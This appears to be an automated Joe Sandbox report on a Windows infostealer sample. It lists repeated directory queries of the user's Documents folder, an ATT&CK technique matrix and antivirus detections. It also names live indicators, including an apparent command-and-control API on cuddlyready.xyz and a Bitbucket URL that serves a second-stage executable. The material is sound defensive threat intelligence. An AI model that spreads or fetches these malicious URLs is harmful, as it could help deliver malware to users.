              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: Process Memory Space: BJQizQ6sqT.exe PID: 4140, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: BJQizQ6sqT.exe PID: 4140, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              2
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              751
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              2
              Process Injection
              LSASS Memory34
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS2
              File and Directory Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets223
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              BJQizQ6sqT.exe61%ReversingLabsWin32.Infostealer.Tinba
              BJQizQ6sqT.exe100%AviraTR/Crypt.TPM.Gen
              BJQizQ6sqT.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              3.5.29.90
              truefalse
                high
                bitbucket.org
                185.166.143.48
                truefalse
                  high
                  cuddlyready.xyz
                  172.67.150.173
                  truefalse
                    high
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      high
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        sendypaster.xyzfalse
                          high
                          steppriflej.xyzfalse
                            high
                            smash-boiling.cyoufalse
                              high
                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                high
                                supporse-comment.cyoufalse
                                  high
                                  hosue-billowy.cyoufalse
                                    high
                                    cuddlyready.xyzfalse
                                      high
                                      ripe-blade.cyoufalse
                                        high
                                        greywe-snotty.cyoufalse
                                          high
                                          https://cuddlyready.xyz/apitrue
                                            unknown
                                            pollution-raker.cyoufalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabBJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cuddlyready.xyz/BJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001069000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368445147.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2314997008.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2541077126.0000000001069000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368602207.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://cuddlyready.xyz/apilBJQizQ6sqT.exe, 00000000.00000003.2368237256.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540893328.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cuddlyready.xyz/apiimeBJQizQ6sqT.exe, 00000000.00000003.2236263252.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2236423205.00000000058DB000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2239087852.00000000058DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgBJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netBJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://remote-app-switcher.prod-east.frontend.public.atl-paas.netBJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0BJQizQ6sqT.exe, 00000000.00000002.2540495872.0000000000E6A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cuddlyready.xyz/sBJQizQ6sqT.exe, 00000000.00000003.2314997008.0000000001073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeoSsBJQizQ6sqT.exe, 00000000.00000003.2469446904.000000000105A000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540893328.000000000105C000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aui-cdn.atlassian.com/BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exexBJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cuddlyready.xyz/apirepo=BJQizQ6sqT.exe, 00000000.00000003.2368237256.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540893328.0000000001058000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://support.mozilla.org/products/firefoxgro.allBJQizQ6sqT.exe, 00000000.00000003.2266162204.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.mozilla.orBJQizQ6sqT.exe, 00000000.00000003.2266049972.00000000059DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://bitbucket.org/BJQizQ6sqT.exe, 00000000.00000003.2469003813.0000000001069000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2541077126.0000000001069000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netBJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoBJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.microHBJQizQ6sqT.exe, 00000000.00000003.2368237256.000000000103B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://web-security-reports.services.atlassian.com/csp-report/bb-websiteBJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl3.digi6BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://upx.sf.netAmcache.hve.12.drfalse
                                                                                                                  high
                                                                                                                  http://ocsp.rootca1.amazontrust.com0:BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://nsis.sf.net/NSIS_ErrorErrorBJQizQ6sqT.exe, 00000000.00000003.2468878619.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543983298.0000000006029000.00000002.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468837205.00000000058F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.ecosia.org/newtab/BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBJQizQ6sqT.exe, 00000000.00000003.2266162204.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://dz8aopenkvv6s.cloudfront.netBJQizQ6sqT.exe, 00000000.00000002.2543339826.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://ac.ecosia.org/autocomplete?q=BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cuddlyready.xyz:443/apiBJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2264300318.000000000107A000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netBJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cdn.cookielaw.org/BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3BJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://cuddlyready.xyz/pihBJQizQ6sqT.exe, 00000000.00000003.2368445147.0000000001073000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2368602207.0000000001073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://cuddlyready.xyz/apiz6d2aulIgapAATu2Q4g14DFmyGQ/HKqBJQizQ6sqT.exe, 00000000.00000003.2368237256.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://remote-app-switcher.stg-east.frontend.public.atl-paas.netBJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://bbuseruploads.s3.amazonaws.com/BJQizQ6sqT.exe, 00000000.00000002.2543339826.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaBJQizQ6sqT.exe, 00000000.00000003.2266586985.00000000058DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          185.166.143.48
                                                                                                                                                          bitbucket.orgGermany
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          3.5.29.90
                                                                                                                                                          s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                          172.67.150.173
                                                                                                                                                          cuddlyready.xyzUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1579796
                                                                                                                                                          Start date and time:2024-12-23 09:15:43 +01:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 6m 7s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:18
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:BJQizQ6sqT.exe
                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                          Original Sample Name:daed40d82d8d43f2ad0be3fb944c99a3.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 2
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.181.0, 20.223.35.26, 13.107.246.63, 20.12.23.50, 150.171.28.10, 20.190.177.149, 20.223.36.55
                                                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
                                                                                                                                                          • Execution Graph export aborted for target BJQizQ6sqT.exe, PID 4140 because there are no executed function
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • VT rate limit hit for: BJQizQ6sqT.exe
                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          03:16:41API Interceptor31x Sleep call for process: BJQizQ6sqT.exe modified
                                                                                                                                                          03:17:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                                                                          • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                                                                          172.67.150.173RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • artemis-rat.comartemis-rat.com:443
                                                                                                                                                          063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                          • artemis-rat.comartemis-rat.com:443
                                                                                                                                                          SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • artemis-rat.comartemis-rat.com:443
                                                                                                                                                          DHL- Shipping invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • artemis-rat.comartemis-rat.com:443
                                                                                                                                                          DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • artemis-rat.comartemis-rat.com:443
                                                                                                                                                          Kazeem usering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                          POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                          PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
